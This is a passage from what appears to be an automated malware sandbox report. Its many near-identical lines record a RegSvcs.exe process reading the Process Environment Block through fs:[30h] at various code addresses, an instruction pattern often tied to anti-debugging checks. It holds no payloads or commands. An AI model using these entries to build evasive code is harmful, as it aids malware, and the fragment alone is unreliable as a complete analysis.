                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A660 mov eax, dword ptr fs:[00000030h]3_2_0101A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A660 mov eax, dword ptr fs:[00000030h]3_2_0101A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A866E mov eax, dword ptr fs:[00000030h]3_2_010A866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A866E mov eax, dword ptr fs:[00000030h]3_2_010A866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01012674 mov eax, dword ptr fs:[00000030h]3_2_01012674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8770 mov eax, dword ptr fs:[00000030h]3_2_00FE8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0770 mov eax, dword ptr fs:[00000030h]3_2_00FF0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C6A6 mov eax, dword ptr fs:[00000030h]3_2_0101C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0750 mov eax, dword ptr fs:[00000030h]3_2_00FE0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010166B0 mov eax, dword ptr fs:[00000030h]3_2_010166B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0101A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A6C7 mov eax, dword ptr fs:[00000030h]3_2_0101A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0710 mov eax, dword ptr fs:[00000030h]3_2_00FE0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E6F2 mov eax, dword ptr fs:[00000030h]3_2_0105E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E6F2 mov eax, dword ptr fs:[00000030h]3_2_0105E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E6F2 mov eax, dword ptr fs:[00000030h]3_2_0105E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E6F2 mov eax, dword ptr fs:[00000030h]3_2_0105E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010606F1 mov eax, dword ptr fs:[00000030h]3_2_010606F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010606F1 mov eax, dword ptr fs:[00000030h]3_2_010606F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E908 mov eax, dword ptr fs:[00000030h]3_2_0105E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105E908 mov eax, dword ptr fs:[00000030h]3_2_0105E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106C912 mov eax, dword ptr fs:[00000030h]3_2_0106C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106892A mov eax, dword ptr fs:[00000030h]3_2_0106892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107892B mov eax, dword ptr fs:[00000030h]3_2_0107892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01060946 mov eax, dword ptr fs:[00000030h]3_2_01060946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01006962 mov eax, dword ptr fs:[00000030h]3_2_01006962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01006962 mov eax, dword ptr fs:[00000030h]3_2_01006962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01006962 mov eax, dword ptr fs:[00000030h]3_2_01006962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E mov eax, dword ptr fs:[00000030h]3_2_0102096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E mov edx, dword ptr fs:[00000030h]3_2_0102096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102096E mov eax, dword ptr fs:[00000030h]3_2_0102096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084978 mov eax, dword ptr fs:[00000030h]3_2_01084978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01084978 mov eax, dword ptr fs:[00000030h]3_2_01084978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0887 mov eax, dword ptr fs:[00000030h]3_2_00FE0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106C97C mov eax, dword ptr fs:[00000030h]3_2_0106C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4859 mov eax, dword ptr fs:[00000030h]3_2_00FE4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4859 mov eax, dword ptr fs:[00000030h]3_2_00FE4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010689B3 mov esi, dword ptr fs:[00000030h]3_2_010689B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010689B3 mov eax, dword ptr fs:[00000030h]3_2_010689B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010689B3 mov eax, dword ptr fs:[00000030h]3_2_010689B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF2840 mov ecx, dword ptr fs:[00000030h]3_2_00FF2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010769C0 mov eax, dword ptr fs:[00000030h]3_2_010769C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010149D0 mov eax, dword ptr fs:[00000030h]3_2_010149D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA9D3 mov eax, dword ptr fs:[00000030h]3_2_010AA9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E9E0 mov eax, dword ptr fs:[00000030h]3_2_0106E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010129F9 mov eax, dword ptr fs:[00000030h]3_2_010129F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010129F9 mov eax, dword ptr fs:[00000030h]3_2_010129F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106C810 mov eax, dword ptr fs:[00000030h]3_2_0106C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEA9D0 mov eax, dword ptr fs:[00000030h]3_2_00FEA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101A830 mov eax, dword ptr fs:[00000030h]3_2_0101A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108483A mov eax, dword ptr fs:[00000030h]3_2_0108483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108483A mov eax, dword ptr fs:[00000030h]3_2_0108483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov eax, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov eax, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov eax, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov ecx, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov eax, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01002835 mov eax, dword ptr fs:[00000030h]3_2_01002835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE09AD mov eax, dword ptr fs:[00000030h]3_2_00FE09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE09AD mov eax, dword ptr fs:[00000030h]3_2_00FE09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01010854 mov eax, dword ptr fs:[00000030h]3_2_01010854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF29A0 mov eax, dword ptr fs:[00000030h]3_2_00FF29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E872 mov eax, dword ptr fs:[00000030h]3_2_0106E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E872 mov eax, dword ptr fs:[00000030h]3_2_0106E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076870 mov eax, dword ptr fs:[00000030h]3_2_01076870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076870 mov eax, dword ptr fs:[00000030h]3_2_01076870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106C89D mov eax, dword ptr fs:[00000030h]3_2_0106C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100E8C0 mov eax, dword ptr fs:[00000030h]3_2_0100E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8918 mov eax, dword ptr fs:[00000030h]3_2_00FD8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8918 mov eax, dword ptr fs:[00000030h]3_2_00FD8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AA8E4 mov eax, dword ptr fs:[00000030h]3_2_010AA8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C8F9 mov eax, dword ptr fs:[00000030h]3_2_0101C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101C8F9 mov eax, dword ptr fs:[00000030h]3_2_0101C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105EB1D mov eax, dword ptr fs:[00000030h]3_2_0105EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EB20 mov eax, dword ptr fs:[00000030h]3_2_0100EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EB20 mov eax, dword ptr fs:[00000030h]3_2_0100EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A8B28 mov eax, dword ptr fs:[00000030h]3_2_010A8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010A8B28 mov eax, dword ptr fs:[00000030h]3_2_010A8B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0AD0 mov eax, dword ptr fs:[00000030h]3_2_00FE0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094B4B mov eax, dword ptr fs:[00000030h]3_2_01094B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094B4B mov eax, dword ptr fs:[00000030h]3_2_01094B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076B40 mov eax, dword ptr fs:[00000030h]3_2_01076B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01076B40 mov eax, dword ptr fs:[00000030h]3_2_01076B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010AAB40 mov eax, dword ptr fs:[00000030h]3_2_010AAB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01088B42 mov eax, dword ptr fs:[00000030h]3_2_01088B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EB50 mov eax, dword ptr fs:[00000030h]3_2_0108EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8AA0 mov eax, dword ptr fs:[00000030h]3_2_00FE8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8AA0 mov eax, dword ptr fs:[00000030h]3_2_00FE8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FEEA80 mov eax, dword ptr fs:[00000030h]3_2_00FEEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0A5B mov eax, dword ptr fs:[00000030h]3_2_00FF0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0A5B mov eax, dword ptr fs:[00000030h]3_2_00FF0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE6A50 mov eax, dword ptr fs:[00000030h]3_2_00FE6A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094BB0 mov eax, dword ptr fs:[00000030h]3_2_01094BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01094BB0 mov eax, dword ptr fs:[00000030h]3_2_01094BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01000BCB mov eax, dword ptr fs:[00000030h]3_2_01000BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EBD0 mov eax, dword ptr fs:[00000030h]3_2_0108EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106CBF0 mov eax, dword ptr fs:[00000030h]3_2_0106CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EBFC mov eax, dword ptr fs:[00000030h]3_2_0100EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8BF0 mov eax, dword ptr fs:[00000030h]3_2_00FE8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106CA11 mov eax, dword ptr fs:[00000030h]3_2_0106CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA24 mov eax, dword ptr fs:[00000030h]3_2_0101CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0100EA2E mov eax, dword ptr fs:[00000030h]3_2_0100EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE0BCD mov eax, dword ptr fs:[00000030h]3_2_00FE0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01004A35 mov eax, dword ptr fs:[00000030h]3_2_01004A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01004A35 mov eax, dword ptr fs:[00000030h]3_2_01004A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA38 mov eax, dword ptr fs:[00000030h]3_2_0101CA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0BBE mov eax, dword ptr fs:[00000030h]3_2_00FF0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FF0BBE mov eax, dword ptr fs:[00000030h]3_2_00FF0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0108EA60 mov eax, dword ptr fs:[00000030h]3_2_0108EA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0101CA6F mov eax, dword ptr fs:[00000030h]3_2_0101CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105CA72 mov eax, dword ptr fs:[00000030h]3_2_0105CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105CA72 mov eax, dword ptr fs:[00000030h]3_2_0105CA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDCB7E mov eax, dword ptr fs:[00000030h]3_2_00FDCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010B4A80 mov eax, dword ptr fs:[00000030h]3_2_010B4A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01018A90 mov edx, dword ptr fs:[00000030h]3_2_01018A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036AA4 mov eax, dword ptr fs:[00000030h]3_2_01036AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01036ACC mov eax, dword ptr fs:[00000030h]3_2_01036ACC
